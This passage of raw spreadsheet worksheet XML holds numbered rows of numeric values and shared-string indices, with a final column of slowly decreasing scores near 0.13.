      <c r="B23654" s="2">
        <v>2.5032855E7</v>
      </c>
      <c r="C23654" s="2" t="s">
        <v>22795</v>
      </c>
      <c r="D23654" s="2">
        <v>1.0</v>
      </c>
      <c r="E23654" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23654" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23655" ht="15.75" customHeight="1">
      <c r="A23655" s="1">
        <v>28624.0</v>
      </c>
      <c r="B23655" s="2">
        <v>2.7172074E7</v>
      </c>
      <c r="C23655" s="2" t="s">
        <v>22810</v>
      </c>
      <c r="D23655" s="2">
        <v>1.0</v>
      </c>
      <c r="E23655" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23655" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23656" ht="15.75" customHeight="1">
      <c r="A23656" s="1">
        <v>29876.0</v>
      </c>
      <c r="B23656" s="2">
        <v>3.6031568E7</v>
      </c>
      <c r="C23656" s="2" t="s">
        <v>22811</v>
      </c>
      <c r="D23656" s="2">
        <v>1.0</v>
      </c>
      <c r="E23656" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23656" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23657" ht="15.75" customHeight="1">
      <c r="A23657" s="1">
        <v>30235.0</v>
      </c>
      <c r="B23657" s="2">
        <v>3.7452257E7</v>
      </c>
      <c r="C23657" s="2" t="s">
        <v>22797</v>
      </c>
      <c r="D23657" s="2">
        <v>1.0</v>
      </c>
      <c r="E23657" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23657" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23658" ht="15.75" customHeight="1">
      <c r="A23658" s="1">
        <v>31597.0</v>
      </c>
      <c r="B23658" s="2">
        <v>5131622.0</v>
      </c>
      <c r="C23658" s="2" t="s">
        <v>22812</v>
      </c>
      <c r="D23658" s="2">
        <v>1.0</v>
      </c>
      <c r="E23658" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23658" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23659" ht="15.75" customHeight="1">
      <c r="A23659" s="1">
        <v>32673.0</v>
      </c>
      <c r="B23659" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C23659" s="2" t="s">
        <v>22813</v>
      </c>
      <c r="D23659" s="2">
        <v>1.0</v>
      </c>
      <c r="E23659" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23659" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23660" ht="15.75" customHeight="1">
      <c r="A23660" s="1">
        <v>33049.0</v>
      </c>
      <c r="B23660" s="2">
        <v>6775704.0</v>
      </c>
      <c r="C23660" s="2" t="s">
        <v>22814</v>
      </c>
      <c r="D23660" s="2">
        <v>1.0</v>
      </c>
      <c r="E23660" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23660" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23661" ht="15.75" customHeight="1">
      <c r="A23661" s="1">
        <v>33232.0</v>
      </c>
      <c r="B23661" s="2">
        <v>7287463.0</v>
      </c>
      <c r="C23661" s="2" t="s">
        <v>22815</v>
      </c>
      <c r="D23661" s="2">
        <v>1.0</v>
      </c>
      <c r="E23661" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23661" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23662" ht="15.75" customHeight="1">
      <c r="A23662" s="1">
        <v>33312.0</v>
      </c>
      <c r="B23662" s="2">
        <v>7515712.0</v>
      </c>
      <c r="C23662" s="2" t="s">
        <v>22816</v>
      </c>
      <c r="D23662" s="2">
        <v>1.0</v>
      </c>
      <c r="E23662" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23662" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23663" ht="15.75" customHeight="1">
      <c r="A23663" s="1">
        <v>33666.0</v>
      </c>
      <c r="B23663" s="2">
        <v>8420432.0</v>
      </c>
      <c r="C23663" s="2" t="s">
        <v>22817</v>
      </c>
      <c r="D23663" s="2">
        <v>1.0</v>
      </c>
      <c r="E23663" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23663" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23664" ht="15.75" customHeight="1">
      <c r="A23664" s="1">
        <v>34160.0</v>
      </c>
      <c r="B23664" s="2">
        <v>9889828.0</v>
      </c>
      <c r="C23664" s="2" t="s">
        <v>22818</v>
      </c>
      <c r="D23664" s="2">
        <v>1.0</v>
      </c>
      <c r="E23664" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23664" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23665" ht="15.75" customHeight="1">
      <c r="A23665" s="1">
        <v>10159.0</v>
      </c>
      <c r="B23665" s="2">
        <v>5.7333006E7</v>
      </c>
      <c r="C23665" s="2" t="s">
        <v>22819</v>
      </c>
      <c r="D23665" s="2">
        <v>1.0</v>
      </c>
      <c r="E23665" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23665" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="23666" ht="15.75" customHeight="1">
      <c r="A23666" s="1">
        <v>22714.0</v>
      </c>
      <c r="B23666" s="2">
        <v>4.3380769E7</v>
      </c>
      <c r="C23666" s="2" t="s">
        <v>22820</v>
      </c>
      <c r="D23666" s="2">
        <v>1.0</v>
      </c>
      <c r="E23666" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23666" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="23667" ht="15.75" customHeight="1">
      <c r="A23667" s="1">
        <v>24319.0</v>
      </c>
      <c r="B23667" s="2">
        <v>1.0620503E7</v>
      </c>
      <c r="C23667" s="2" t="s">
        <v>22821</v>
      </c>
      <c r="D23667" s="2">
        <v>1.0</v>
      </c>
      <c r="E23667" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23667" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="23668" ht="15.75" customHeight="1">
      <c r="A23668" s="1">
        <v>30455.0</v>
      </c>
      <c r="B23668" s="2">
        <v>3.9458278E7</v>
      </c>
      <c r="C23668" s="2" t="s">
        <v>22822</v>
      </c>
      <c r="D23668" s="2">
        <v>1.0</v>
      </c>
      <c r="E23668" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23668" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="23669" ht="15.75" customHeight="1">
      <c r="A23669" s="1">
        <v>32919.0</v>
      </c>
      <c r="B23669" s="2">
        <v>6418469.0</v>
      </c>
      <c r="C23669" s="2" t="s">
        <v>22823</v>
      </c>
      <c r="D23669" s="2">
        <v>1.0</v>
      </c>
      <c r="E23669" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23669" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="23670" ht="15.75" customHeight="1">
      <c r="A23670" s="1">
        <v>24467.0</v>
      </c>
      <c r="B23670" s="2">
        <v>1.096788E7</v>
      </c>
      <c r="C23670" s="2" t="s">
        <v>22824</v>
      </c>
      <c r="D23670" s="2">
        <v>1.0</v>
      </c>
      <c r="E23670" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23670" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="23671" ht="15.75" customHeight="1">
      <c r="A23671" s="1">
        <v>30588.0</v>
      </c>
      <c r="B23671" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C23671" s="2" t="s">
        <v>22825</v>
      </c>
      <c r="D23671" s="2">
        <v>1.0</v>
      </c>
      <c r="E23671" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23671" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="23672" ht="15.75" customHeight="1">
      <c r="A23672" s="1">
        <v>32550.0</v>
      </c>
      <c r="B23672" s="2">
        <v>5751946.0</v>
      </c>
      <c r="C23672" s="2" t="s">
        <v>22826</v>
      </c>
      <c r="D23672" s="2">
        <v>1.0</v>
      </c>
      <c r="E23672" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23672" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="23673" ht="15.75" customHeight="1">
      <c r="A23673" s="1">
        <v>34185.0</v>
      </c>
      <c r="B23673" s="2">
        <v>9956662.0</v>
      </c>
      <c r="C23673" s="2" t="s">
        <v>22827</v>
      </c>
      <c r="D23673" s="2">
        <v>1.0</v>
      </c>
      <c r="E23673" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23673" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="23674" ht="15.75" customHeight="1">
      <c r="A23674" s="1">
        <v>11671.0</v>
      </c>
      <c r="B23674" s="2">
        <v>2.3378079E7</v>
      </c>
      <c r="C23674" s="2" t="s">
        <v>22828</v>
      </c>
      <c r="D23674" s="2">
        <v>1.0</v>
      </c>
      <c r="E23674" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23674" s="2">
        <v>0.1299603174603174</v>
      </c>
    </row>
    <row r="23675" ht="15.75" customHeight="1">
      <c r="A23675" s="1">
        <v>24380.0</v>
      </c>
      <c r="B23675" s="2">
        <v>1.0767649E7</v>
      </c>
      <c r="C23675" s="2" t="s">
        <v>22829</v>
      </c>
      <c r="D23675" s="2">
        <v>1.0</v>
      </c>
      <c r="E23675" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23675" s="2">
        <v>0.1299283154121865</v>
      </c>
    </row>
    <row r="23676" ht="15.75" customHeight="1">
      <c r="A23676" s="1">
        <v>24589.0</v>
      </c>
      <c r="B23676" s="2">
        <v>1.1349534E7</v>
      </c>
      <c r="C23676" s="2" t="s">
        <v>22830</v>
      </c>
      <c r="D23676" s="2">
        <v>1.0</v>
      </c>
      <c r="E23676" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23676" s="2">
        <v>0.1299283154121865</v>
      </c>
    </row>
    <row r="23677" ht="15.75" customHeight="1">
      <c r="A23677" s="1">
        <v>20769.0</v>
      </c>
      <c r="B23677" s="2">
        <v>1.4962822E7</v>
      </c>
      <c r="C23677" s="2" t="s">
        <v>22831</v>
      </c>
      <c r="D23677" s="2">
        <v>1.0</v>
      </c>
      <c r="E23677" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23677" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="23678" ht="15.75" customHeight="1">
      <c r="A23678" s="1">
        <v>21004.0</v>
      </c>
      <c r="B23678" s="2">
        <v>1.721072E7</v>
      </c>
      <c r="C23678" s="2" t="s">
        <v>22832</v>
      </c>
      <c r="D23678" s="2">
        <v>1.0</v>
      </c>
      <c r="E23678" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23678" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="23679" ht="15.75" customHeight="1">
      <c r="A23679" s="1">
        <v>24113.0</v>
      </c>
      <c r="B23679" s="2">
        <v>9960817.0</v>
      </c>
      <c r="C23679" s="2" t="s">
        <v>22770</v>
      </c>
      <c r="D23679" s="2">
        <v>1.0</v>
      </c>
      <c r="E23679" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23679" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="23680" ht="15.75" customHeight="1">
      <c r="A23680" s="1">
        <v>24888.0</v>
      </c>
      <c r="B23680" s="2">
        <v>1.2255915E7</v>
      </c>
      <c r="C23680" s="2" t="s">
        <v>22833</v>
      </c>
      <c r="D23680" s="2">
        <v>1.0</v>
      </c>
      <c r="E23680" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23680" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="23681" ht="15.75" customHeight="1">
      <c r="A23681" s="1">
        <v>25064.0</v>
      </c>
      <c r="B23681" s="2">
        <v>1.2874085E7</v>
      </c>
      <c r="C23681" s="2" t="s">
        <v>22834</v>
      </c>
      <c r="D23681" s="2">
        <v>1.0</v>
      </c>
      <c r="E23681" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23681" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="23682" ht="15.75" customHeight="1">
      <c r="A23682" s="1">
        <v>23863.0</v>
      </c>
      <c r="B23682" s="2">
        <v>8338333.0</v>
      </c>
      <c r="C23682" s="2" t="s">
        <v>22835</v>
      </c>
      <c r="D23682" s="2">
        <v>1.0</v>
      </c>
      <c r="E23682" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23682" s="2">
        <v>0.1299019607843138</v>
      </c>
    </row>
    <row r="23683" ht="15.75" customHeight="1">
      <c r="A23683" s="1">
        <v>20513.0</v>
      </c>
      <c r="B23683" s="2">
        <v>1.3059674E7</v>
      </c>
      <c r="C23683" s="2" t="s">
        <v>22710</v>
      </c>
      <c r="D23683" s="2">
        <v>1.0</v>
      </c>
      <c r="E23683" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23683" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23684" ht="15.75" customHeight="1">
      <c r="A23684" s="1">
        <v>24617.0</v>
      </c>
      <c r="B23684" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C23684" s="2" t="s">
        <v>22836</v>
      </c>
      <c r="D23684" s="2">
        <v>1.0</v>
      </c>
      <c r="E23684" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23684" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23685" ht="15.75" customHeight="1">
      <c r="A23685" s="1">
        <v>25138.0</v>
      </c>
      <c r="B23685" s="2">
        <v>1.3024707E7</v>
      </c>
      <c r="C23685" s="2" t="s">
        <v>22837</v>
      </c>
      <c r="D23685" s="2">
        <v>1.0</v>
      </c>
      <c r="E23685" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23685" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23686" ht="15.75" customHeight="1">
      <c r="A23686" s="1">
        <v>25331.0</v>
      </c>
      <c r="B23686" s="2">
        <v>1.3474356E7</v>
      </c>
      <c r="C23686" s="2" t="s">
        <v>22838</v>
      </c>
      <c r="D23686" s="2">
        <v>1.0</v>
      </c>
      <c r="E23686" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23686" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23687" ht="15.75" customHeight="1">
      <c r="A23687" s="1">
        <v>28796.0</v>
      </c>
      <c r="B23687" s="2">
        <v>2.8601259E7</v>
      </c>
      <c r="C23687" s="2" t="s">
        <v>22839</v>
      </c>
      <c r="D23687" s="2">
        <v>1.0</v>
      </c>
      <c r="E23687" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23687" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23688" ht="15.75" customHeight="1">
      <c r="A23688" s="1">
        <v>31793.0</v>
      </c>
      <c r="B23688" s="2">
        <v>5237006.0</v>
      </c>
      <c r="C23688" s="2" t="s">
        <v>22840</v>
      </c>
      <c r="D23688" s="2">
        <v>1.0</v>
      </c>
      <c r="E23688" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23688" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23689" ht="15.75" customHeight="1">
      <c r="A23689" s="1">
        <v>31816.0</v>
      </c>
      <c r="B23689" s="2">
        <v>5252596.0</v>
      </c>
      <c r="C23689" s="2" t="s">
        <v>22841</v>
      </c>
      <c r="D23689" s="2">
        <v>1.0</v>
      </c>
      <c r="E23689" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23689" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23690" ht="15.75" customHeight="1">
      <c r="A23690" s="1">
        <v>32731.0</v>
      </c>
      <c r="B23690" s="2">
        <v>6014998.0</v>
      </c>
      <c r="C23690" s="2" t="s">
        <v>22841</v>
      </c>
      <c r="D23690" s="2">
        <v>1.0</v>
      </c>
      <c r="E23690" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23690" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="23691" ht="15.75" customHeight="1">
      <c r="A23691" s="1">
        <v>23362.0</v>
      </c>
      <c r="B23691" s="2">
        <v>5.5091919E7</v>
      </c>
      <c r="C23691" s="2" t="s">
        <v>22842</v>
      </c>
      <c r="D23691" s="2">
        <v>1.0</v>
      </c>
      <c r="E23691" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23691" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="23692" ht="15.75" customHeight="1">
      <c r="A23692" s="1">
        <v>10086.0</v>
      </c>
      <c r="B23692" s="2">
        <v>5.7170248E7</v>
      </c>
      <c r="C23692" s="2" t="s">
        <v>22843</v>
      </c>
      <c r="D23692" s="2">
        <v>1.0</v>
      </c>
      <c r="E23692" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23692" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="23693" ht="15.75" customHeight="1">
      <c r="A23693" s="1">
        <v>32441.0</v>
      </c>
      <c r="B23693" s="2">
        <v>5.6650733E7</v>
      </c>
      <c r="C23693" s="2" t="s">
        <v>22844</v>
      </c>
      <c r="D23693" s="2">
        <v>1.0</v>
      </c>
      <c r="E23693" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23693" s="2">
        <v>0.1290598290598291</v>
      </c>
    </row>
    <row r="23694" ht="15.75" customHeight="1">
      <c r="A23694" s="1">
        <v>370.0</v>
      </c>
      <c r="B23694" s="2">
        <v>1.6323759E7</v>
      </c>
      <c r="C23694" s="2" t="s">
        <v>22845</v>
      </c>
      <c r="D23694" s="2">
        <v>1.0</v>
      </c>
      <c r="E23694" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23694" s="2">
        <v>0.1289308176100629</v>
      </c>
    </row>
    <row r="23695" ht="15.75" customHeight="1">
      <c r="A23695" s="1">
        <v>17041.0</v>
      </c>
      <c r="B23695" s="2">
        <v>4.8512467E7</v>
      </c>
      <c r="C23695" s="2" t="s">
        <v>22846</v>
      </c>
      <c r="D23695" s="2">
        <v>1.0</v>
      </c>
      <c r="E23695" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23695" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="23696" ht="15.75" customHeight="1">
      <c r="A23696" s="1">
        <v>28128.0</v>
      </c>
      <c r="B23696" s="2">
        <v>2.4724821E7</v>
      </c>
      <c r="C23696" s="2" t="s">
        <v>22847</v>
      </c>
      <c r="D23696" s="2">
        <v>1.0</v>
      </c>
      <c r="E23696" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23696" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="23697" ht="15.75" customHeight="1">
      <c r="A23697" s="1">
        <v>28665.0</v>
      </c>
      <c r="B23697" s="2">
        <v>2.7434373E7</v>
      </c>
      <c r="C23697" s="2" t="s">
        <v>22848</v>
      </c>
      <c r="D23697" s="2">
        <v>1.0</v>
      </c>
      <c r="E23697" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23697" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="23698" ht="15.75" customHeight="1">
      <c r="A23698" s="1">
        <v>30521.0</v>
      </c>
      <c r="B23698" s="2">
        <v>4019843.0</v>
      </c>
      <c r="C23698" s="2" t="s">
        <v>22849</v>
      </c>
      <c r="D23698" s="2">
        <v>1.0</v>
      </c>
      <c r="E23698" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23698" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="23699" ht="15.75" customHeight="1">
      <c r="A23699" s="1">
        <v>21147.0</v>
      </c>
      <c r="B23699" s="2">
        <v>1.874007E7</v>
      </c>
      <c r="C23699" s="2" t="s">
        <v>22850</v>
      </c>
      <c r="D23699" s="2">
        <v>1.0</v>
      </c>
      <c r="E23699" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23699" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="23700" ht="15.75" customHeight="1">
      <c r="A23700" s="1">
        <v>21013.0</v>
      </c>
      <c r="B23700" s="2">
        <v>1.73121E7</v>
      </c>
      <c r="C23700" s="2" t="s">
        <v>22851</v>
      </c>
      <c r="D23700" s="2">
        <v>1.0</v>
      </c>
      <c r="E23700" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23700" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="23701" ht="15.75" customHeight="1">
      <c r="A23701" s="1">
        <v>26451.0</v>
      </c>
      <c r="B23701" s="2">
        <v>1.7301893E7</v>
      </c>
      <c r="C23701" s="2" t="s">
        <v>22852</v>
      </c>
      <c r="D23701" s="2">
        <v>1.0</v>
      </c>
      <c r="E23701" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23701" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="23702" ht="15.75" customHeight="1">
      <c r="A23702" s="1">
        <v>31168.0</v>
      </c>
      <c r="B23702" s="2">
        <v>4903933.0</v>
      </c>
      <c r="C23702" s="2" t="s">
        <v>22853</v>
      </c>
      <c r="D23702" s="2">
        <v>1.0</v>
      </c>
      <c r="E23702" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23702" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="23703" ht="15.75" customHeight="1">
      <c r="A23703" s="1">
        <v>26250.0</v>
      </c>
      <c r="B23703" s="2">
        <v>1.6324144E7</v>
      </c>
      <c r="C23703" s="2" t="s">
        <v>22854</v>
      </c>
      <c r="D23703" s="2">
        <v>1.0</v>
      </c>
      <c r="E23703" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23703" s="2">
        <v>0.1283783783783784</v>
      </c>
    </row>
    <row r="23704" ht="15.75" customHeight="1">
      <c r="A23704" s="1">
        <v>8108.0</v>
      </c>
      <c r="B23704" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C23704" s="2" t="s">
        <v>22855</v>
      </c>
      <c r="D23704" s="2">
        <v>1.0</v>
      </c>
      <c r="E23704" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23704" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23705" ht="15.75" customHeight="1">
      <c r="A23705" s="1">
        <v>11669.0</v>
      </c>
      <c r="B23705" s="2">
        <v>2.3377949E7</v>
      </c>
      <c r="C23705" s="2" t="s">
        <v>22856</v>
      </c>
      <c r="D23705" s="2">
        <v>1.0</v>
      </c>
      <c r="E23705" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23705" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23706" ht="15.75" customHeight="1">
      <c r="A23706" s="1">
        <v>16831.0</v>
      </c>
      <c r="B23706" s="2">
        <v>4.7885242E7</v>
      </c>
      <c r="C23706" s="2" t="s">
        <v>22857</v>
      </c>
      <c r="D23706" s="2">
        <v>1.0</v>
      </c>
      <c r="E23706" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23706" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23707" ht="15.75" customHeight="1">
      <c r="A23707" s="1">
        <v>20193.0</v>
      </c>
      <c r="B23707" s="2">
        <v>1.0531218E7</v>
      </c>
      <c r="C23707" s="2" t="s">
        <v>22858</v>
      </c>
      <c r="D23707" s="2">
        <v>1.0</v>
      </c>
      <c r="E23707" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23707" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23708" ht="15.75" customHeight="1">
      <c r="A23708" s="1">
        <v>20329.0</v>
      </c>
      <c r="B23708" s="2">
        <v>1.150157E7</v>
      </c>
      <c r="C23708" s="2" t="s">
        <v>22804</v>
      </c>
      <c r="D23708" s="2">
        <v>1.0</v>
      </c>
      <c r="E23708" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23708" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23709" ht="15.75" customHeight="1">
      <c r="A23709" s="1">
        <v>23055.0</v>
      </c>
      <c r="B23709" s="2">
        <v>5.0272601E7</v>
      </c>
      <c r="C23709" s="2" t="s">
        <v>22859</v>
      </c>
      <c r="D23709" s="2">
        <v>1.0</v>
      </c>
      <c r="E23709" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23709" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23710" ht="15.75" customHeight="1">
      <c r="A23710" s="1">
        <v>23301.0</v>
      </c>
      <c r="B23710" s="2">
        <v>5404213.0</v>
      </c>
      <c r="C23710" s="2" t="s">
        <v>22860</v>
      </c>
      <c r="D23710" s="2">
        <v>1.0</v>
      </c>
      <c r="E23710" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23710" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23711" ht="15.75" customHeight="1">
      <c r="A23711" s="1">
        <v>23932.0</v>
      </c>
      <c r="B23711" s="2">
        <v>8674717.0</v>
      </c>
      <c r="C23711" s="2" t="s">
        <v>22861</v>
      </c>
      <c r="D23711" s="2">
        <v>1.0</v>
      </c>
      <c r="E23711" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23711" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23712" ht="15.75" customHeight="1">
      <c r="A23712" s="1">
        <v>24419.0</v>
      </c>
      <c r="B23712" s="2">
        <v>1.0849949E7</v>
      </c>
      <c r="C23712" s="2" t="s">
        <v>22862</v>
      </c>
      <c r="D23712" s="2">
        <v>1.0</v>
      </c>
      <c r="E23712" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23712" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23713" ht="15.75" customHeight="1">
      <c r="A23713" s="1">
        <v>25153.0</v>
      </c>
      <c r="B23713" s="2">
        <v>1.3059673E7</v>
      </c>
      <c r="C23713" s="2" t="s">
        <v>22863</v>
      </c>
      <c r="D23713" s="2">
        <v>1.0</v>
      </c>
      <c r="E23713" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23713" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23714" ht="15.75" customHeight="1">
      <c r="A23714" s="1">
        <v>26380.0</v>
      </c>
      <c r="B23714" s="2">
        <v>1.6978644E7</v>
      </c>
      <c r="C23714" s="2" t="s">
        <v>22864</v>
      </c>
      <c r="D23714" s="2">
        <v>1.0</v>
      </c>
      <c r="E23714" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23714" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23715" ht="15.75" customHeight="1">
      <c r="A23715" s="1">
        <v>30758.0</v>
      </c>
      <c r="B23715" s="2">
        <v>4.4261494E7</v>
      </c>
      <c r="C23715" s="2" t="s">
        <v>22865</v>
      </c>
      <c r="D23715" s="2">
        <v>1.0</v>
      </c>
      <c r="E23715" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23715" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23716" ht="15.75" customHeight="1">
      <c r="A23716" s="1">
        <v>33773.0</v>
      </c>
      <c r="B23716" s="2">
        <v>8674716.0</v>
      </c>
      <c r="C23716" s="2" t="s">
        <v>22861</v>
      </c>
      <c r="D23716" s="2">
        <v>1.0</v>
      </c>
      <c r="E23716" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23716" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23717" ht="15.75" customHeight="1">
      <c r="A23717" s="1">
        <v>33876.0</v>
      </c>
      <c r="B23717" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C23717" s="2" t="s">
        <v>22866</v>
      </c>
      <c r="D23717" s="2">
        <v>1.0</v>
      </c>
      <c r="E23717" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23717" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="23718" ht="15.75" customHeight="1">
      <c r="A23718" s="1">
        <v>4571.0</v>
      </c>
      <c r="B23718" s="2">
        <v>4.2749735E7</v>
      </c>
      <c r="C23718" s="2" t="s">
        <v>22867</v>
      </c>
      <c r="D23718" s="2">
        <v>1.0</v>
      </c>
      <c r="E23718" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23718" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23719" ht="15.75" customHeight="1">
      <c r="A23719" s="1">
        <v>6660.0</v>
      </c>
      <c r="B23719" s="2">
        <v>4.9101704E7</v>
      </c>
      <c r="C23719" s="2" t="s">
        <v>22868</v>
      </c>
      <c r="D23719" s="2">
        <v>1.0</v>
      </c>
      <c r="E23719" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23719" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23720" ht="15.75" customHeight="1">
      <c r="A23720" s="1">
        <v>7126.0</v>
      </c>
      <c r="B23720" s="2">
        <v>5.0420678E7</v>
      </c>
      <c r="C23720" s="2" t="s">
        <v>22869</v>
      </c>
      <c r="D23720" s="2">
        <v>1.0</v>
      </c>
      <c r="E23720" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23720" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23721" ht="15.75" customHeight="1">
      <c r="A23721" s="1">
        <v>17395.0</v>
      </c>
      <c r="B23721" s="2">
        <v>4.962216E7</v>
      </c>
